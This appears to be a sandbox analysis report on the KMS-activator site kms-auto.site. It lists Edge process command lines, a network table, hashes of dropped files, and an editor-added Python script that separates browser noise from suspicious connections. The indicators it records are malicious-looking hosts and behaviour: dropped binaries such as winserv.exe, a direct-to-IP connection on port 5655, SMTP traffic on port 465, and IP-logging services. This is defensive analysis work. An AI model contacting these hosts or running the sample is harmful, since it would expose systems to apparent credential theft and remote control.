"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4816,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4868 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=604,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4768 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5792,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5448 /prefetch:8

C:\ProgramData\Windows Tasks Service\winserv.exe

"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe

C:\Windows\SysWOW64\unsecapp.exe

"C:\Windows\SysWOW64\unsecapp.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4052,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4124 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 kms-auto.site udp
US 8.8.8.8:53 kms-auto.site udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 copilot.microsoft.com udp
US 8.8.8.8:53 copilot.microsoft.com udp
US 150.171.28.11:80 edge.microsoft.com tcp
US 172.67.212.241:443 kms-auto.site tcp
US 172.67.212.241:443 kms-auto.site tcp
US 150.171.27.11:443 edge.microsoft.com tcp
US 13.107.246.64:443 api.edgeoffer.microsoft.com tcp
GB 2.18.66.73:443 copilot.microsoft.com tcp
US 172.67.212.241:443 kms-auto.site tcp
US 13.107.246.64:443 api.edgeoffer.microsoft.com tcp
GB 2.18.66.73:443 copilot.microsoft.com tcp
US 150.171.27.11:443 edge.microsoft.com tcp
US 172.67.212.241:443 kms-auto.site udp
US 172.67.212.241:443 kms-auto.site tcp
US 8.8.8.8:53 cdn.gtranslate.net udp
US 8.8.8.8:53 cdn.gtranslate.net udp
US 8.8.8.8:53 mc.yandex.ru udp
US 8.8.8.8:53 mc.yandex.ru udp
US 104.26.13.42:443 cdn.gtranslate.net tcp
RU 77.88.21.119:443 mc.yandex.ru tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 mc.yandex.com udp
US 8.8.8.8:53 mc.yandex.com udp
US 8.8.8.8:53 mc.yandex.com udp
US 8.8.8.8:53 mc.yandex.com udp
RU 87.250.250.119:443 mc.yandex.com tcp
RU 87.250.250.119:443 mc.yandex.com tcp
RU 87.250.250.119:443 mc.yandex.com tcp
RU 77.88.21.119:443 mc.yandex.com tcp
US 172.67.212.241:443 kms-auto.site udp
US 150.171.27.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 update.googleapis.com udp
US 8.8.8.8:53 update.googleapis.com udp
NL 108.177.119.94:443 update.googleapis.com tcp
GB 2.18.66.168:443 www.bing.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.28.11:443 edge.microsoft.com tcp
N/A 224.0.0.251:5353 udp
GB 2.18.66.168:443 www.bing.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
RU 87.250.251.119:443 mc.yandex.com tcp
RU 87.250.251.119:443 mc.yandex.com tcp
US 8.8.8.8:53 b-wpi.ru udp
US 8.8.8.8:53 b-wpi.ru udp
NL 46.21.250.137:443 b-wpi.ru tcp
NL 46.21.250.137:443 b-wpi.ru tcp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 13.107.246.64:443 edge-consumer-static.azureedge.net tcp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 13.107.246.64:443 static.edge.microsoftapp.net tcp
US 150.171.28.11:443 edge.microsoft.com tcp
US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
US 13.107.246.64:443 edge-mobile-static.azureedge.net tcp
US 172.67.212.241:443 kms-auto.site udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
IT 91.80.49.86:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
GB 104.86.110.120:443 www.bing.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 c.pki.goog udp
NL 173.194.69.94:80 c.pki.goog tcp
US 172.67.212.241:443 kms-auto.site udp
GB 104.86.110.120:443 www.bing.com udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 edgeassetservice.azureedge.net udp
US 8.8.8.8:53 edgeassetservice.azureedge.net udp
US 13.107.246.64:443 edgeassetservice.azureedge.net tcp
US 172.67.212.241:443 kms-auto.site udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
US 172.67.212.241:443 kms-auto.site udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
GB 2.18.66.171:443 www.bing.com udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 checkappexec.microsoft.com udp
GB 13.87.96.169:443 checkappexec.microsoft.com tcp
IT 91.80.49.86:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
IT 91.80.49.86:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 copilot.microsoft.com udp
US 8.8.8.8:53 copilot.microsoft.com udp
GB 2.18.66.57:443 copilot.microsoft.com tcp
US 8.8.8.8:53 studiostaticassetsprod.azureedge.net udp
US 8.8.8.8:53 studiostaticassetsprod.azureedge.net udp
US 13.107.246.64:443 studiostaticassetsprod.azureedge.net tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
US 150.171.27.11:443 edge.microsoft.com tcp
GB 104.86.110.97:443 www.bing.com tcp
US 8.8.8.8:53 ntp.msn.com udp
US 8.8.8.8:53 ntp.msn.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 13.107.246.64:443 api.edgeoffer.microsoft.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 assets.msn.com udp
US 8.8.8.8:53 assets.msn.com udp
US 8.8.8.8:53 img-s-msn-com.akamaized.net udp
US 8.8.8.8:53 img-s-msn-com.akamaized.net udp
US 8.8.8.8:53 sb.scorecardresearch.com udp
US 8.8.8.8:53 sb.scorecardresearch.com udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 th.bing.com udp
GB 2.18.190.182:443 assets.msn.com tcp
GB 2.18.190.182:443 assets.msn.com tcp
GB 2.18.190.182:443 assets.msn.com tcp
US 8.8.8.8:53 c.msn.com udp
US 8.8.8.8:53 c.msn.com udp
US 8.8.8.8:53 c.bing.com udp
US 8.8.8.8:53 c.bing.com udp
GB 2.18.66.169:443 www.bing.com tcp
GB 2.18.190.182:443 assets.msn.com tcp
IE 13.74.129.1:443 c.msn.com tcp
US 150.171.28.10:443 c.bing.com tcp
GB 104.86.110.96:443 www.bing.com tcp
FR 52.222.169.76:443 sb.scorecardresearch.com tcp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
GB 2.18.190.182:443 assets.msn.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
GB 2.18.190.182:443 assets.msn.com udp
GB 2.18.190.182:443 assets.msn.com udp
US 8.8.8.8:53 srtb.msn.com udp
US 8.8.8.8:53 srtb.msn.com udp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net tcp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net tcp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net tcp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net udp
GB 104.86.110.96:443 www.bing.com tcp
GB 104.86.110.96:443 www.bing.com udp
GB 2.19.252.151:443 img-s-msn-com.akamaized.net udp
US 8.8.8.8:53 idserver.xyz udp
US 104.21.48.1:80 idserver.xyz tcp
US 8.8.8.8:53 iplogger.co udp
US 172.67.167.249:443 iplogger.co tcp
US 8.8.8.8:53 c.pki.goog udp
NL 173.194.69.94:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
NL 173.194.69.94:80 o.pki.goog tcp
CZ 91.184.249.83:5655 tcp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 13.107.246.64:443 edge-consumer-static.azureedge.net tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 freemail.freehost.com.ua udp
UA 194.0.200.251:465 freemail.freehost.com.ua tcp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 13.107.246.64:443 static.edge.microsoftapp.net tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
IT 91.80.49.21:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
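Most rows in the table above are Microsoft Edge and OS telemetry, because the sample was detonated by opening the URL in a browser. The following example, added by the page editor and not part of the sandbox report, parses rows in the table's own format and separates that noise from connections that deserve analyst attention: the submitted host, direct-to-IP connections with no resolved name, non-standard ports, mail ports, and the IP-lookup services behind the report's "Looks up external IP address via web service" signature. The noise suffix list and the flag heuristics are the editor's assumptions; `SAMPLE_ROWS` is a constructed subset of the table.

```python
"""Triage of a sandbox Network table (editor-added example).

Rows have the shape "<country> <ip>:<port> [<domain>] <proto>"; the domain
column is absent for connections the sandbox could not tie to a DNS answer.
SAMPLE_ROWS is a constructed subset of the table in this report. The suffix
list and the flags below are the editor's heuristics, not report findings.
"""
from typing import Dict, List, Optional

SUBMITTED_HOST = "kms-auto.site"   # the URL the report analysed

SAMPLE_ROWS = """\
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
US 172.67.212.241:443 kms-auto.site tcp
RU 77.88.21.119:443 mc.yandex.ru tcp
US 8.8.8.8:53 iplogger.co udp
US 172.67.167.249:443 iplogger.co tcp
CZ 91.184.249.83:5655 tcp
US 208.95.112.1:80 ip-api.com tcp
UA 194.0.200.251:465 freemail.freehost.com.ua tcp
NL 173.194.69.94:80 c.pki.goog tcp
N/A 224.0.0.251:5353 udp
"""

# Domain suffixes the browser and OS contact on their own (editor's assumption).
NOISE_SUFFIXES = (
    ".microsoft.com", ".bing.com", ".msn.com", ".azureedge.net",
    ".microsoftapp.net", ".googleapis.com", ".pki.goog", ".akamaized.net",
    ".scorecardresearch.com",
)
# Public IP-lookup / visitor-logging services seen in the report.
IP_LOOKUP_DOMAINS = ("ip-api.com", "iplogger.co")
MAIL_PORTS = {25, 465, 587}


def parse_row(row: str) -> Optional[dict]:
    """Split one table row into fields; rows without a domain have three columns."""
    parts = row.split()
    if len(parts) == 4:
        country, dest, domain, proto = parts
    elif len(parts) == 3:
        country, dest, proto = parts
        domain = ""
    else:
        return None
    ip, port = dest.rsplit(":", 1)
    return {"country": country, "ip": ip, "port": int(port),
            "domain": domain, "proto": proto}


def is_noise(rec: dict) -> bool:
    """DNS/mDNS rows and well-known browser/OS endpoints are dropped from triage."""
    if rec["port"] in (53, 5353):
        return True
    domain = rec["domain"]
    return bool(domain) and any(domain.endswith(s) for s in NOISE_SUFFIXES)


def triage(rows: str) -> Dict[str, List[str]]:
    """Map "ip:port" of each non-noise connection to the heuristic flags it raised."""
    out: Dict[str, List[str]] = {}
    for row in rows.splitlines():
        rec = parse_row(row)
        if rec is None or is_noise(rec):
            continue
        flags: List[str] = []
        if not rec["domain"]:
            flags.append("direct_to_ip")            # no DNS name: hard-coded C2 candidate
        if rec["port"] not in (80, 443):
            flags.append(f"nonstandard_port_{rec['port']}")
        if rec["port"] in MAIL_PORTS:
            flags.append("smtp_exfil_candidate")    # mail submission from a sandbox VM
        if rec["domain"] in IP_LOOKUP_DOMAINS:
            flags.append("external_ip_lookup")
        if rec["domain"] == SUBMITTED_HOST:
            flags.append("submitted_url_host")
        out.setdefault(f"{rec['ip']}:{rec['port']}", flags)
    return out


if __name__ == "__main__":
    for key, flags in triage(SAMPLE_ROWS).items():
        print(f"{key:24} {', '.join(flags) or '(unclassified)'}")
```

An empty flag list (here `mc.yandex.ru`, which is the analytics script of the visited page) is still reported rather than dropped: the point of the noise list is to remove what is known to be the browser's, not to hide what is merely unexplained. The direct-to-IP connection on port 5655 and the port 465 connection are exactly the rows an analyst should pivot on next, with the samples' dropped binaries (`winserv.exe`, `unsecapp.exe`) as the likely sources.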

Files

\??\pipe\crashpad_1188_MFJLFUJCFASNXRBA

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 845d842365a2b1d6fc543d5987a8444c
SHA1 d9e74493c371fda8850da9a0daa8bc4f77ec0326
SHA256 6f55c946ac04a6258c714365d9a2cd4ac841e695f3be9f04e84310e5d9ab6110
SHA512 3fa48469bc4e7d480b7ad5c98a8a3e4e3f210ad986b6aa4e6d8b3a2a0061b2ad7423ac673fb45a435bbdd927f623e3032039b8fbf0aaf5a9ecd98831378562d1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 38d6d1d1e45be19825fc28191b82953c
SHA1 527778930202971fddd2f32a60b25756c2d26c68
SHA256 40f0260693f82c5c8425ede2cc137ee3d45eb0c0f0916b67d73b05a5029a49ac
SHA512 ab8588a7ef927c914af3b5c63893e409e3f7de4606ab7f22806198e86085d96a480125cf8153d91a37d4a3fdc088b3256b0282ba664f8eac025d3b9b567c730b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\000\t\Paths\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

MD5 30e377505ec4f100cf4426003a277efe
SHA1 5ed7705afda986f6b83977ca7d2c236b05d8764c
SHA256 3c970ea95256e66c9fddab517a2095c23a528906c30a2f1ff51b7af55081a956
SHA512 3fac9fbf41fc5618fdcced6b71c7642afe0d8ff57a462097f76835da68e050a0f97dc9ef043d1bdc4955a6a59e025b85d4f91fd0d9af875ce6c9a68db67bac83

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 0058a8ff9cf739f9993f2c398758feff
SHA1 fde4e2a03333da9860f4d5ac57ff8e93335b258a
SHA256 1e4e785eec1b08d590ddaeedaf8c4da361ffabc1eb0bb256f9dbcca08926b6b7
SHA512 eb7003a463b0eac5b853df21e9ca71699387633ac34c7fae4525bed9afc9c317f492be4378e4a0656cb6b0a2e5568e590d7d32b2a036b554d8143b77212d6a1e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

MD5 0755cb96c061ec84ef950959d37a9149
SHA1 136b62b2dd9ef0a02c3a847128a3b960e38c6ce3
SHA256 ca79ca5814eacbb0470d01ae3d583487be8bf1ca2563a219bd48f63bc7e13104
SHA512 8014c7b2323e3a66c54a77befbb1e4f30e8d1aa9ffee3739af6a053533eda5d5ad1ffcef2767a9958813508c1edb85633d18179a4acc886dab23e969c0982b08

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

MD5 2b66d93c82a06797cdfd9df96a09e74a
SHA1 5f7eb526ee8a0c519b5d86c845fea8afd15b0c28
SHA256 d4c064db769b3c109da2ed80a53fbab00987c17421a47921e41e213781d67954
SHA512 95e45c0aea0e704be5f512dffaae377d4abef78da99b3bca769264d69be20f2570daf2f47905645217e1b2696e42b101f26149219f148b4d6dd97a6c2868b6f5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 3367d719ea1f750b9030144de5f41e49
SHA1 adf3197401953d4bf4db9a471428812b96478458
SHA256 d29c0f65005e4cce382796cd1506465a517d11558606844f2da0cc14d8a8671e
SHA512 8356fea9806736e3231dc8728d758ff50c297301ef634f1b7f310d7e5e5ad3dce44603d947da3eed0f5ffaf9eb58ca2300e809c4813e2609bb8a2e8e5bc823c8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 f61ff8a76b902d38a7f0b0b913df0809
SHA1 3cd1d1acdf341bca7108188294fbf122df6b1f0a
SHA256 5ea52ac89c0d5e53f851389db64c2fea3db91ea0a8b8b8a4799e851446567a3e
SHA512 295cda06641fbaaf0a607cf1b4a420cc0a1778d9a072b75dfd800969a84341cb2a60098c093d373e5e5da45c3ba20db9d2bbecacebdedb46cf5bc66a6ec67467

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

MD5 20d4b8fa017a12a108c87f540836e250
SHA1 1ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA256 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 291c5883fa312e5add47f78d2d4d06d6
SHA1 f8b3f68bc58282007462ec874af28c702a147fe7
SHA256 6f5a78bcca18b244c3db221aa97fe823d01236373d38ce60f47de1197592510e
SHA512 1be924a839c6bfd469ea7da8a1abc860c2394672da8becdbcf419bd928547842cab73116bdd5fc4d5d8e6c0fdfedcd9f2b61d874046c1e7823bfc464e5f970f0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 92be2585d4e607ebcad11ab954198acf
SHA1 17a3c5570de98a22f956bb59f2e51d8141681f52
SHA256 0c6e08ac5572212150d8d90fc3d9260df9c448cc41c9f290cd0662925a1eee33
SHA512 c47fd34290f11fa4734d34c0eed46c9cfae579ef6ad711f8317a4733aadf71134653119f254d073d639b7f0fe6fedeb1e31029ffe6eaddae9df2fbb8bfdb1d31

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe57a4fa.TMP

MD5 f59dce7143f42cfa8734cac4acee8397
SHA1 f1df959104321916633ab92992d5adfdaf8564b9
SHA256 70b33699e0b01d82eeebbe1dddbdd4f0a34d55e1ef05329144b0f5b1ba1a9263
SHA512 9a9aefc98ee82862a5cd103acaeea4b05c58faa21755c2824b1f8782f5430546f35b1defa39e07edaec63daac7bd1507cefb1b07c62c4895c752d38712e8ecfc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 6de2d1d4a0ca2a9d2b79aad17e94ab87
SHA1 b05cc14a8c73c6ca04c10bcabf5ae8e39ebddae8
SHA256 9c04a0ade86b9962bb95826086cdb7a67c5ff61a856bf9593168f893619a8587
SHA512 4f5ffde174fb092ad519d352928f3315496f09b422e293eefbf1b1da2b42aec7c7b2c2e0afd31e235aba0c301596219926b1993bbf1ef78f0edfa4ca7447ad61

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

MD5 7447417dbafbe1dd05d99e847ae51258
SHA1 b290b29b5afa9993956a1abe736669d28ba42257
SHA256 23069a5c811489e9b3a61e3cb605008fdd1c26e2e9eb261d997bd337805bd710
SHA512 7c2cf2fa0bf1417f19c0ca8abcf3e9f0f62eda4793d1d059e34f4d900b95da82e7c0dafc0334d4c1073a66cf55640ddf01195616be881fff9769ca5b881bc273

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

MD5 c421ffcc5977177154f534ba8a5029ae
SHA1 3fdfd5a19d55e39259feae14606fffab4c76efee
SHA256 71e6c0cd425df7ff29c8d1e142ab121a168bfaf85499d037cc4069fa7133515c
SHA512 b50c49280c40b59dbac2b1512f10b745b4df5b32492a9d2202f90a221e433bc78fa0a2894e495e01108d048ea0252570d9f3f0f9793b30daa27d1e2e5404aa5f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig

MD5 3f8927c365639daa9b2c270898e3cf9d
SHA1 c8da31c97c56671c910d28010f754319f1d90fa6
SHA256 fc80d48a732def35ab6168d8fd957a6f13f3c912d7f9baf960c17249e4a9a1f2
SHA512 d75b93f30989428883cb5e76f6125b09f565414cf45d59053527db48c6cf2ac7f54ed9e8f6a713c855cd5d89531145592ef27048cf1c0f63d7434cfb669dbd72

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

MD5 af5a8ccdf4b83383454d0633ac12101f
SHA1 1ed4c7962e272c576e0eb1303a192b9b411a71f9
SHA256 582e48a3e0971bc2dc2e4fd4dcb2629c8be0865d8eae99a59968fa7c4db24671
SHA512 cf5f4cd48d17211469742ede3e92122aab8fcfeb924a0bbdf894e3a8c0f69f585c6b0d3a86f5e8e60a0e9ad9b393b8ea03b31a24a2160ead93f9e421324bed79

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 223e95a10c0d7f3ae1342198068775ac
SHA1 e3bbf7cfe52627e0f2a8b4508abe437c88077f27
SHA256 3c8d7b1c83ad8ed47e48b717c3d409cfa58ff00acb4c27e638d89068c425c83b
SHA512 623c75bc77e624220392f6df179e46e346e91e28eb8d7130194b6f015520a1246a74955a2062d3a1d12740693ae12469cb8ce8fc5e8129bbd20a49fe19849753

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 9a458cb4e791939f78f40dbd52fba323
SHA1 e41404e1e7467f75d57b8cc6562790da6198df14
SHA256 5fba5184f68d2a5d84774067a06eae61ed8e5d6c122477d16e49e8aabe6f54b7
SHA512 5ebe2ee700c76b19663317a0a0ca6b09b4fc2073027f4cf28b49ce6523f56d61d7465797c569c7aad60404f51a045ea4021eefbe8ed2baeb586f252f43ca4cf5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1c79390706807a17ff6a350efb6c9978
SHA1 2dc9968898df93b74be807dae7a7a9e216c569cc
SHA256 32cfa5f6873d6e2df79c4eee1796b04cd3be9aa2dd91230598cd1063ba20b343
SHA512 9ab33cc5402c07127489ebfb3463207bcfec76f476c942babb50e5c6c9b6ec869d52b0f13328491485d1272be1b61ee14ac1a270e9e5f271202c6490dca34ab2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 a66a4535f50c39d7832e48ca61756c12
SHA1 beb5c30e6b5c78407a11a8a4fd5f8e3ebdc36691
SHA256 4e5ef2a514f82037bdf00b9f1a889097f9925daa9576c9ee2cc64948c7bdec9f
SHA512 00cb41dcbf5af7041372da8512088cb2877c67103100aa01a84af31395fe79e222a16718ec88e8bee50c566555483501b13636cc1f047e563aa60b198e9de9bd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old

MD5 26c0c227375f191ce814124955dd64de
SHA1 05dca8f12b860f6806a2eef865492b548c1033d9
SHA256 63e5398fecf5a8ef84840685d6ba326e748bd46b11b158b5b935d57d38bfc28d
SHA512 f470e959e72bc89ce95fca5e92305043c6d3e183b858cbdfa36728bd5c9e0d9923cc82cae2d7fffb37368fa7625625664d840fdfc36c10f6b200d6ff282a8e54

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 9eac58694a7bc02a0b3f963721d6073f
SHA1 2c915fb2b3fdb079317441ed5d8d19c3ea9a5885
SHA256 2f1e00c4befe64bbc856b966c6e6bb62ad59161d19dbd76ef005060edcd26f51
SHA512 5cf86f9c08a4df1e46509f762c7a8bc590d813de77c98c1b50765120137941f95ebf7cdff45d7ba7fb4a37b778c014f220b441827f01a76ff2ea273080d14232

